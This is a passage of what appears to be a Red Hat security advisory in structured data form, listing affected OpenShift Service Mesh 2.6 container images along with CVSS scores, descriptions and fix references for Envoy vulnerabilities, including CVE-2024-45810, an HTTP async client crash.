"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Malicious log injection via access logs", }, { cve: "CVE-2024-45810", cwe: { id: "CWE-119", name: "Improper Restriction of Operations within the Bounds of a Memory Buffer", }, discovery_date: "2024-09-20T00:40:31.483825+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313687", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy. Envoy will crash when the http async client is handling `sendLocalReply` under some circumstances, such as websocket upgrade and requests mirroring. The http async client will crash during the `sendLocalReply()` in http async client if the http async client is duplicating the status code or if the destruction of the router is called at the destructor of the async stream while the stream is deferred or deleted. This issue occurs when the stream decoder is destroyed but it's reference is called in `router.onDestroy()`, causing a segment fault. This will impact ext_authz if the `upgrade` and `connection` header are allowed.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Envoy crashes for `LocalReply` in HTTP async client", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in Envoy related to the HTTP async client crashing during `sendLocalReply()` is classified as moderate severity rather than important due to the crash is contingent on particular scenarios, such as websocket upgrades and request mirroring, which may not be common in all deployments. Additionally, while the segmentation fault can disrupt service, it does not compromise data integrity or expose sensitive information.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45810", }, { category: "external", summary: "RHBZ#2313687", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313687", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45810", url: "https://www.cve.org/CVERecord?id=CVE-2024-45810", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45810", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45810", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q", }, ], release_date: "2024-09-20T00:15:03.153000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", 